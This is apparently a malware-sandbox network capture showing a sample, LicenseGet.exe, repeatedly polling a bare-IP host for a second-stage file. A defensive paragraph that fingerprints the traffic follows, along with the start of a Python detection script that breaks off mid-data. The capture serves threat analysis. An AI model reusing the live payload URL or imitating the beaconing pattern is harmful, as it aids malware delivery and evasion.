  Remote address: 95.214.53.95:80
  Request:
    GET /blob/d.ez HTTP/1.1
    Host: 95.214.53.95
    User-Agent: curl/5.9
    Connection: close
    X-CSRF-TOKEN: u9Fn/JXbD49hoFlC3amYak/n9FugB4FHOHf0o0ADdqsFJDsE2WIwqf3pt3AGORHyXTiomUXgeWuuFlveSeVMlA==
    Cookie: CSRF-TOKEN=u9Fn/JXbD49hoFlC3amYak/n9FugB4FHOHf0o0ADdqsFJDsE2WIwqf3pt3AGORHyXTiomUXgeWuuFlveSeVMlA==; LANG=en-US
  Response:
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Fri, 04 Oct 2024 04:55:06 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
• flag-pl  GET  http://95.214.53.95/blob/d.ez  (LicenseGet.exe)
  Remote address: 95.214.53.95:80
  Request:
    GET /blob/d.ez HTTP/1.1
    Host: 95.214.53.95
    User-Agent: curl/5.9
    Connection: close
    X-CSRF-TOKEN: 9oOA41N4ZT4JqSczgSqMntFgGrNfw2N7snNbgmURj322poeM+idcbPDzpifosLfCEog39XZq/JTgFgwU5EwPKQ==
    Cookie: CSRF-TOKEN=9oOA41N4ZT4JqSczgSqMntFgGrNfw2N7snNbgmURj322poeM+idcbPDzpifosLfCEog39XZq/JTgFgwU5EwPKQ==; LANG=en-US
  Response:
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Fri, 04 Oct 2024 04:55:11 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
• flag-pl  GET  http://95.214.53.95/blob/d.ez  (LicenseGet.exe)
  Remote address: 95.214.53.95:80
  Request:
    GET /blob/d.ez HTTP/1.1
    Host: 95.214.53.95
    User-Agent: curl/5.9
    Connection: close
    X-CSRF-TOKEN: OCNpSo9MggOD1ytVsOp9D6xhvnoBjNdhqmkM0f4hYLD+rgniMmEz5/ZC2BuuXKpo7PGSDDNJxCDvS+VpBs9gXA==
    Cookie: CSRF-TOKEN=OCNpSo9MggOD1ytVsOp9D6xhvnoBjNdhqmkM0f4hYLD+rgniMmEz5/ZC2BuuXKpo7PGSDDNJxCDvS+VpBs9gXA==; LANG=en-US
  Response:
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Fri, 04 Oct 2024 04:55:17 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
• flag-pl  GET  http://95.214.53.95/blob/d.ez  (LicenseGet.exe)
  Remote address: 95.214.53.95:80
  Request:
    GET /blob/d.ez HTTP/1.1
    Host: 95.214.53.95
    User-Agent: curl/5.9
    Connection: close
    X-CSRF-TOKEN: bSuOAigtRSZ4aBRIwSj4MwLdL84FZVoTZbe6BB/RsuVgBtFB4b+JYt+Sh7DNTXoHwPjZ59ZQ+NnNBlUAAq3AdQ==
    Cookie: CSRF-TOKEN=bSuOAigtRSZ4aBRIwSj4MwLdL84FZVoTZbe6BB/RsuVgBtFB4b+JYt+Sh7DNTXoHwPjZ59ZQ+NnNBlUAAq3AdQ==; LANG=en-US
  Response:
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Fri, 04 Oct 2024 04:55:22 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
• flag-pl  GET  http://95.214.53.95/blob/d.ez  (LicenseGet.exe)
  Remote address: 95.214.53.95:80
  Request:
    GET /blob/d.ez HTTP/1.1
    Host: 95.214.53.95
    User-Agent: curl/5.9
    Connection: close
    X-CSRF-TOKEN: 5MlFWMIa+gfKgrA5Y/EdJmD2GA8qLiEdTsL9gF4PxLV0xc/hJWsKWFixpAVZHOBBO8Mzho7iBAzAdvxQknH43g==
    Cookie: CSRF-TOKEN=5MlFWMIa+gfKgrA5Y/EdJmD2GA8qLiEdTsL9gF4PxLV0xc/hJWsKWFixpAVZHOBBO8Mzho7iBAzAdvxQknH43g==; LANG=en-US
  Response:
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Fri, 04 Oct 2024 04:55:27 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
                                                                                                                                • flag-pl
                                                                                                                                  GET
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  LicenseGet.exe
                                                                                                                                  Remote address:
                                                                                                                                  95.214.53.95:80
                                                                                                                                  Request
                                                                                                                                  GET /blob/d.ez HTTP/1.1
                                                                                                                                  Host: 95.214.53.95
                                                                                                                                  User-Agent: curl/5.9
                                                                                                                                  Connection: close
                                                                                                                                  X-CSRF-TOKEN: 3qL3vsMFGLL3EhvIC2f0bGkk2InrFOHqzX7c+S+gpQwZth8iL2+SsmGzauFl41bPkzSmC5QkIM64dJ9ytZg27Q==
                                                                                                                                  Cookie: CSRF-TOKEN=3qL3vsMFGLL3EhvIC2f0bGkk2InrFOHqzX7c+S+gpQwZth8iL2+SsmGzauFl41bPkzSmC5QkIM64dJ9ytZg27Q==; LANG=en-US
                                                                                                                                  Response
                                                                                                                                  HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Fri, 04 Oct 2024 04:55:32 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                • flag-pl
                                                                                                                                  GET
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  LicenseGet.exe
                                                                                                                                  Remote address:
                                                                                                                                  95.214.53.95:80
                                                                                                                                  Request
                                                                                                                                  GET /blob/d.ez HTTP/1.1
                                                                                                                                  Host: 95.214.53.95
                                                                                                                                  User-Agent: curl/5.9
                                                                                                                                  Connection: close
                                                                                                                                  X-CSRF-TOKEN: eh4kMrxcCHNhbZKbH0TBUugsjLTKNA+AjW8o/GrhjqYgRaGXpqL+1Z9xuiBzg5eI/CQ1v8gsapc5UPyXY0Jfbg==
                                                                                                                                  Cookie: CSRF-TOKEN=eh4kMrxcCHNhbZKbH0TBUugsjLTKNA+AjW8o/GrhjqYgRaGXpqL+1Z9xuiBzg5eI/CQ1v8gsapc5UPyXY0Jfbg==; LANG=en-US
                                                                                                                                  Response
                                                                                                                                  HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Fri, 04 Oct 2024 04:55:37 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                • flag-pl
                                                                                                                                  GET
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  LicenseGet.exe
                                                                                                                                  Remote address:
                                                                                                                                  95.214.53.95:80
                                                                                                                                  Request
                                                                                                                                  GET /blob/d.ez HTTP/1.1
                                                                                                                                  Host: 95.214.53.95
                                                                                                                                  User-Agent: curl/5.9
                                                                                                                                  Connection: close
                                                                                                                                  X-CSRF-TOKEN: QYa+AK31Byd0clVj1wwrNApQGpDiagHn7m1l7cot7RkBc+iLftm1AvHgWJQXEQ4qHMDXkX4yLSU9OsH+Ki4EzA==
                                                                                                                                  Cookie: CSRF-TOKEN=QYa+AK31Byd0clVj1wwrNApQGpDiagHn7m1l7cot7RkBc+iLftm1AvHgWJQXEQ4qHMDXkX4yLSU9OsH+Ki4EzA==; LANG=en-US
                                                                                                                                  Response
                                                                                                                                  HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Fri, 04 Oct 2024 04:55:42 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                • flag-pl
                                                                                                                                  GET
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  LicenseGet.exe
                                                                                                                                  Remote address:
                                                                                                                                  95.214.53.95:80
                                                                                                                                  Request
                                                                                                                                  GET /blob/d.ez HTTP/1.1
                                                                                                                                  Host: 95.214.53.95
                                                                                                                                  User-Agent: curl/5.9
                                                                                                                                  Connection: close
                                                                                                                                  X-CSRF-TOKEN: HvDptU2vIdwlkum+X+nMSGz3iBPo/D2RsPEQeVZeQy+BvwQviE2rh9Kth++T74cnb67tf4ldFfxaAgTdFRcubA==
                                                                                                                                  Cookie: CSRF-TOKEN=HvDptU2vIdwlkum+X+nMSGz3iBPo/D2RsPEQeVZeQy+BvwQviE2rh9Kth++T74cnb67tf4ldFfxaAgTdFRcubA==; LANG=en-US
                                                                                                                                  Response
                                                                                                                                  HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Fri, 04 Oct 2024 04:55:47 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                • flag-pl
                                                                                                                                  GET
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  LicenseGet.exe
                                                                                                                                  Remote address:
                                                                                                                                  95.214.53.95:80
                                                                                                                                  Request
                                                                                                                                  GET /blob/d.ez HTTP/1.1
                                                                                                                                  Host: 95.214.53.95
                                                                                                                                  User-Agent: curl/5.9
                                                                                                                                  Connection: close
                                                                                                                                  X-CSRF-TOKEN: lWXtAh1qOmUDs3JNKf8TEpzDXklB3Noskbr2DTbWZomNgOX/v47Q/E1oDBYFboU8+GJie9RT/eM+D2n1zV1iUQ==
                                                                                                                                  Cookie: CSRF-TOKEN=lWXtAh1qOmUDs3JNKf8TEpzDXklB3Noskbr2DTbWZomNgOX/v47Q/E1oDBYFboU8+GJie9RT/eM+D2n1zV1iUQ==; LANG=en-US
                                                                                                                                  Response
                                                                                                                                  HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Fri, 04 Oct 2024 04:55:52 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                • flag-pl
                                                                                                                                  GET
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  LicenseGet.exe
                                                                                                                                  Remote address:
                                                                                                                                  95.214.53.95:80
                                                                                                                                  Request
                                                                                                                                  GET /blob/d.ez HTTP/1.1
                                                                                                                                  Host: 95.214.53.95
                                                                                                                                  User-Agent: curl/5.9
                                                                                                                                  Connection: close
                                                                                                                                  X-CSRF-TOKEN: eQ1j8R5x8EMEwmwG7FcR/5vCOP/6ZaAILDdooJGMJL0MVo8/2zW+7pqxf7BuJZcWCbgTC6eHBMhWcgknQDYwEg==
                                                                                                                                  Cookie: CSRF-TOKEN=eQ1j8R5x8EMEwmwG7FcR/5vCOP/6ZaAILDdooJGMJL0MVo8/2zW+7pqxf7BuJZcWCbgTC6eHBMhWcgknQDYwEg==; LANG=en-US
                                                                                                                                  Response
                                                                                                                                  HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Fri, 04 Oct 2024 04:55:58 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                • flag-pl
                                                                                                                                  GET
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  LicenseGet.exe
                                                                                                                                  Remote address:
                                                                                                                                  95.214.53.95:80
                                                                                                                                  Request
                                                                                                                                  GET /blob/d.ez HTTP/1.1
                                                                                                                                  Host: 95.214.53.95
                                                                                                                                  User-Agent: curl/5.9
                                                                                                                                  Connection: close
                                                                                                                                  X-CSRF-TOKEN: gFHeZiNa1zEEz41wI7RvifjFKGoskRwT7wA8YED07sCVhfgS5yA7vyL9OzrHwARqDTaTqH/nzZGkDUwvYyM1iQ==
                                                                                                                                  Cookie: CSRF-TOKEN=gFHeZiNa1zEEz41wI7RvifjFKGoskRwT7wA8YED07sCVhfgS5yA7vyL9OzrHwARqDTaTqH/nzZGkDUwvYyM1iQ==; LANG=en-US
                                                                                                                                  Response
                                                                                                                                  HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Fri, 04 Oct 2024 04:56:03 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                • flag-pl
                                                                                                                                  GET
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  LicenseGet.exe
                                                                                                                                  Remote address:
                                                                                                                                  95.214.53.95:80
                                                                                                                                  Request
                                                                                                                                  GET /blob/d.ez HTTP/1.1
                                                                                                                                  Host: 95.214.53.95
                                                                                                                                  User-Agent: curl/5.9
                                                                                                                                  Connection: close
                                                                                                                                  X-CSRF-TOKEN: mKHkLUev6JlJzidx9GfbKNe4kKXZFIWxfUQ/LMC93vFaM9WNczqJkcqinVjwZZ+wlS0bHhxtG6m+MwZuBI3uqQ==
                                                                                                                                  Cookie: CSRF-TOKEN=mKHkLUev6JlJzidx9GfbKNe4kKXZFIWxfUQ/LMC93vFaM9WNczqJkcqinVjwZZ+wlS0bHhxtG6m+MwZuBI3uqQ==; LANG=en-US
                                                                                                                                  Response
                                                                                                                                  HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Fri, 04 Oct 2024 04:56:08 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                • flag-pl
                                                                                                                                  GET
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  LicenseGet.exe
                                                                                                                                  Remote address:
                                                                                                                                  95.214.53.95:80
                                                                                                                                  Request
                                                                                                                                  GET /blob/d.ez HTTP/1.1
                                                                                                                                  Host: 95.214.53.95
                                                                                                                                  User-Agent: curl/5.9
                                                                                                                                  Connection: close
                                                                                                                                  X-CSRF-TOKEN: yvfVaU1813kWqLsA35DZwvWAcRD1xBvO0Hyc6lSvCFrD2j+gRkY3BCxzHk1P+LM327T2xx5NYM3ynCBd/ast4g==
                                                                                                                                  Cookie: CSRF-TOKEN=yvfVaU1813kWqLsA35DZwvWAcRD1xBvO0Hyc6lSvCFrD2j+gRkY3BCxzHk1P+LM327T2xx5NYM3ynCBd/ast4g==; LANG=en-US
                                                                                                                                  Response
                                                                                                                                  HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Fri, 04 Oct 2024 04:56:13 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                • flag-pl
                                                                                                                                  GET
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  LicenseGet.exe
                                                                                                                                  Remote address:
                                                                                                                                  95.214.53.95:80
                                                                                                                                  Request
                                                                                                                                  GET /blob/d.ez HTTP/1.1
                                                                                                                                  Host: 95.214.53.95
                                                                                                                                  User-Agent: curl/5.9
                                                                                                                                  Connection: close
                                                                                                                                  X-CSRF-TOKEN: o9gBCaoUlN9OsrL6Xfy2uDhViikfC6yNmHhsFDtSeoVWX0qka56191F2C9XgTXUk61aQC0PWXIljjlyOPc7GDw==
                                                                                                                                  Cookie: CSRF-TOKEN=o9gBCaoUlN9OsrL6Xfy2uDhViikfC6yNmHhsFDtSeoVWX0qka56191F2C9XgTXUk61aQC0PWXIljjlyOPc7GDw==; LANG=en-US
                                                                                                                                  Response
                                                                                                                                  HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Fri, 04 Oct 2024 04:56:18 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                • flag-pl
                                                                                                                                  GET
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  LicenseGet.exe
                                                                                                                                  Remote address:
                                                                                                                                  95.214.53.95:80
                                                                                                                                  Request
                                                                                                                                  GET /blob/d.ez HTTP/1.1
                                                                                                                                  Host: 95.214.53.95
                                                                                                                                  User-Agent: curl/5.9
                                                                                                                                  Connection: close
                                                                                                                                  X-CSRF-TOKEN: jE4q8+5AQAIFKK/RVTmhzcQN7vEdbzMzyee+Ku2tpLE8MwAQyFrBoCoWC1WeQ5e8IdgmXIiKh/9BSl89/gOizw==
                                                                                                                                  Cookie: CSRF-TOKEN=jE4q8+5AQAIFKK/RVTmhzcQN7vEdbzMzyee+Ku2tpLE8MwAQyFrBoCoWC1WeQ5e8IdgmXIiKh/9BSl89/gOizw==; LANG=en-US
                                                                                                                                  Response
                                                                                                                                  HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Fri, 04 Oct 2024 04:56:23 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                • flag-pl
                                                                                                                                  GET
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  LicenseGet.exe
                                                                                                                                  Remote address:
                                                                                                                                  95.214.53.95:80
                                                                                                                                  Request
                                                                                                                                  GET /blob/d.ez HTTP/1.1
                                                                                                                                  Host: 95.214.53.95
                                                                                                                                  User-Agent: curl/5.9
                                                                                                                                  Connection: close
                                                                                                                                  X-CSRF-TOKEN: wOIXZ5XTyAs1mgli7sm0M+WHtgSHs0/hy+0ywS/sifjdJbtaw5pYVIhRrIbDUM9KEwjFQImnXbuNm+g2hqX77g==
                                                                                                                                  Cookie: CSRF-TOKEN=wOIXZ5XTyAs1mgli7sm0M+WHtgSHs0/hy+0ywS/sifjdJbtaw5pYVIhRrIbDUM9KEwjFQImnXbuNm+g2hqX77g==; LANG=en-US
                                                                                                                                  Response
                                                                                                                                  HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Fri, 04 Oct 2024 04:56:28 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                • flag-pl
                                                                                                                                  GET
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  LicenseGet.exe
                                                                                                                                  Remote address:
                                                                                                                                  95.214.53.95:80
                                                                                                                                  Request
                                                                                                                                  GET /blob/d.ez HTTP/1.1
                                                                                                                                  Host: 95.214.53.95
                                                                                                                                  User-Agent: curl/5.9
                                                                                                                                  Connection: close
                                                                                                                                  X-CSRF-TOKEN: TfdLwS71IXz5d6GRD4qMq8AtttBERfwoNjoqeWZD1OEol622jpu1PO0nAgrciRgIug292d+G4zKjx3qtFp8mqw==
                                                                                                                                  Cookie: CSRF-TOKEN=TfdLwS71IXz5d6GRD4qMq8AtttBERfwoNjoqeWZD1OEol622jpu1PO0nAgrciRgIug292d+G4zKjx3qtFp8mqw==; LANG=en-US
                                                                                                                                  Response
                                                                                                                                  HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Fri, 04 Oct 2024 04:56:34 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                • flag-pl
                                                                                                                                  GET
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  LicenseGet.exe
                                                                                                                                  Remote address:
                                                                                                                                  95.214.53.95:80
                                                                                                                                  Request
                                                                                                                                  GET /blob/d.ez HTTP/1.1
                                                                                                                                  Host: 95.214.53.95
                                                                                                                                  User-Agent: curl/5.9
                                                                                                                                  Connection: close
                                                                                                                                  X-CSRF-TOKEN: QDcFuurCMMjhJqe3IvG2pmlJEjVOR9JXTG9xkKh/LVHEeGlVpLlZO3gU1mOj4T/+RQKzWXwBoKTuR2qyfGwMtg==
                                                                                                                                  Cookie: CSRF-TOKEN=QDcFuurCMMjhJqe3IvG2pmlJEjVOR9JXTG9xkKh/LVHEeGlVpLlZO3gU1mOj4T/+RQKzWXwBoKTuR2qyfGwMtg==; LANG=en-US
                                                                                                                                  Response
                                                                                                                                  HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Fri, 04 Oct 2024 04:56:39 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                • flag-pl
                                                                                                                                  GET
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  LicenseGet.exe
                                                                                                                                  Remote address:
                                                                                                                                  95.214.53.95:80
                                                                                                                                  Request
                                                                                                                                  GET /blob/d.ez HTTP/1.1
                                                                                                                                  Host: 95.214.53.95
                                                                                                                                  User-Agent: curl/5.9
                                                                                                                                  Connection: close
                                                                                                                                  X-CSRF-TOKEN: 2bl4hgutn0LmLpM3yJRNUrRZp+kgCwxPmz3pUjO01dGcEfIbVGudY0M19K7GXoG0qHZRXp+Ch1mNd05ixnPv5w==
                                                                                                                                  Cookie: CSRF-TOKEN=2bl4hgutn0LmLpM3yJRNUrRZp+kgCwxPmz3pUjO01dGcEfIbVGudY0M19K7GXoG0qHZRXp+Ch1mNd05ixnPv5w==; LANG=en-US
                                                                                                                                  Response
                                                                                                                                  HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Fri, 04 Oct 2024 04:56:44 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                • flag-pl
                                                                                                                                  GET
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  LicenseGet.exe
                                                                                                                                  Remote address:
                                                                                                                                  95.214.53.95:80
                                                                                                                                  Request
                                                                                                                                  GET /blob/d.ez HTTP/1.1
                                                                                                                                  Host: 95.214.53.95
                                                                                                                                  User-Agent: curl/5.9
                                                                                                                                  Connection: close
                                                                                                                                  X-CSRF-TOKEN: dErpwxKK+IceOSQuxHspSFQGFZY8JEsNwTRdKlofhZthOlnRTh+EKse0Z+fYJwej/TZPm4aIRKZ6/X5fu8DmIw==
                                                                                                                                  Cookie: CSRF-TOKEN=dErpwxKK+IceOSQuxHspSFQGFZY8JEsNwTRdKlofhZthOlnRTh+EKse0Z+fYJwej/TZPm4aIRKZ6/X5fu8DmIw==; LANG=en-US
                                                                                                                                  Response
                                                                                                                                  HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Fri, 04 Oct 2024 04:56:49 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                • flag-pl
                                                                                                                                  GET
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  LicenseGet.exe
                                                                                                                                  Remote address:
                                                                                                                                  95.214.53.95:80
                                                                                                                                  Request
                                                                                                                                  GET /blob/d.ez HTTP/1.1
                                                                                                                                  Host: 95.214.53.95
                                                                                                                                  User-Agent: curl/5.9
                                                                                                                                  Connection: close
                                                                                                                                  X-CSRF-TOKEN: a5TbKHRP2keddO4oa6f/T0ZGLvOXjU4GNs9ij0EQe6frp+NryvTY9t3e8K4O1PERpPnOluX7XJSRQYiutST4vg==
                                                                                                                                  Cookie: CSRF-TOKEN=a5TbKHRP2keddO4oa6f/T0ZGLvOXjU4GNs9ij0EQe6frp+NryvTY9t3e8K4O1PERpPnOluX7XJSRQYiutST4vg==; LANG=en-US
                                                                                                                                  Response
                                                                                                                                  HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Fri, 04 Oct 2024 04:56:54 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                • flag-pl
                                                                                                                                  GET
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  LicenseGet.exe
                                                                                                                                  Remote address:
                                                                                                                                  95.214.53.95:80
                                                                                                                                  Request
                                                                                                                                  GET /blob/d.ez HTTP/1.1
                                                                                                                                  Host: 95.214.53.95
                                                                                                                                  User-Agent: curl/5.9
                                                                                                                                  Connection: close
                                                                                                                                  X-CSRF-TOKEN: 6xdak8aqu97RCAYmbLvRfX6msELfOAp3WXkeWycg8bDbglUfWnz9bKjf6k+b2Ys7ZGMp9gcvmsYCmr/gNlRe7A==
                                                                                                                                  Cookie: CSRF-TOKEN=6xdak8aqu97RCAYmbLvRfX6msELfOAp3WXkeWycg8bDbglUfWnz9bKjf6k+b2Ys7ZGMp9gcvmsYCmr/gNlRe7A==; LANG=en-US
                                                                                                                                  Response
                                                                                                                                  HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Fri, 04 Oct 2024 04:56:59 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                • flag-pl
                                                                                                                                  GET
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  LicenseGet.exe
                                                                                                                                  Remote address:
  Remote address: 95.214.53.95:80
  Request:
    GET /blob/d.ez HTTP/1.1
    Host: 95.214.53.95
    User-Agent: curl/5.9
    Connection: close
    X-CSRF-TOKEN: pw96kcJsbltYjVIJPT9nDSspjIyqu2JHfLeXchElZU59WewXswpewjQ/U+dlBJ2LwFwcxUM1nk4zS6f3186+rg==
    Cookie: CSRF-TOKEN=pw96kcJsbltYjVIJPT9nDSspjIyqu2JHfLeXchElZU59WewXswpewjQ/U+dlBJ2LwFwcxUM1nk4zS6f3186+rg==; LANG=en-US
  Response:
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Fri, 04 Oct 2024 04:57:04 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding

• PL  GET http://95.214.53.95/blob/d.ez  (LicenseGet.exe)
  Remote address: 95.214.53.95:80
  Request:
    GET /blob/d.ez HTTP/1.1
    Host: 95.214.53.95
    User-Agent: curl/5.9
    Connection: close
    X-CSRF-TOKEN: qh7TxZpj4kXepAcKn3+We1b3FwEFgxJLfRGAdoW2pjvFmUQEpk9O4iSry4yPdn2dJ1XmYQI+3Ev2Pn8HbXudEA==
    Cookie: CSRF-TOKEN=qh7TxZpj4kXepAcKn3+We1b3FwEFgxJLfRGAdoW2pjvFmUQEpk9O4iSry4yPdn2dJ1XmYQI+3Ev2Pn8HbXudEA==; LANG=en-US
  Response:
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Fri, 04 Oct 2024 04:57:09 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding

• PL  GET http://95.214.53.95/blob/d.ez  (LicenseGet.exe)
  Remote address: 95.214.53.95:80
  Request:
    GET /blob/d.ez HTTP/1.1
    Host: 95.214.53.95
    User-Agent: curl/5.9
    Connection: close
    X-CSRF-TOKEN: Opx2AfOBXpdnXnenyVjY95lCsV+9sbatgBg40l3u7YKnyC89vtF1UEl6UWA0l2tz/LtcCZjNBLFdJnz8RZEM0Q==
    Cookie: CSRF-TOKEN=Opx2AfOBXpdnXnenyVjY95lCsV+9sbatgBg40l3u7YKnyC89vtF1UEl6UWA0l2tz/LtcCZjNBLFdJnz8RZEM0Q==; LANG=en-US
  Response:
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Fri, 04 Oct 2024 04:57:15 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
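Read together, the three transactions above carry a usable network fingerprint for the dropped LicenseGet.exe: every request goes to a bare IPv4 host, claims a User-Agent of curl/5.9 (no modern curl build reports a major version below 7), sends a 64-byte base64 blob both as an X-CSRF-TOKEN header and as a CSRF-TOKEN cookie, and is repeated every 5 to 6 seconds; the server answered 404 each time, so the sandbox never received the second stage, but the polling loop itself is the indicator. The Python below is an added example written for this page, not tooling from tria.ge or from the sample: it parses the captured request/response pairs (copied from the records above, with response headers trimmed to the status line, Server and Date) and applies those checks. The flag names and the "curl major version below 7 is implausible" heuristic are this example's own assumptions.

```python
import base64
import binascii
import re
from email.utils import parsedate_to_datetime
from ipaddress import ip_address

# Request/response pairs copied from the three LicenseGet.exe records above.
# Response headers are trimmed to status line, Server and Date.
RECORDS = [
    ("""GET /blob/d.ez HTTP/1.1
Host: 95.214.53.95
User-Agent: curl/5.9
Connection: close
X-CSRF-TOKEN: pw96kcJsbltYjVIJPT9nDSspjIyqu2JHfLeXchElZU59WewXswpewjQ/U+dlBJ2LwFwcxUM1nk4zS6f3186+rg==
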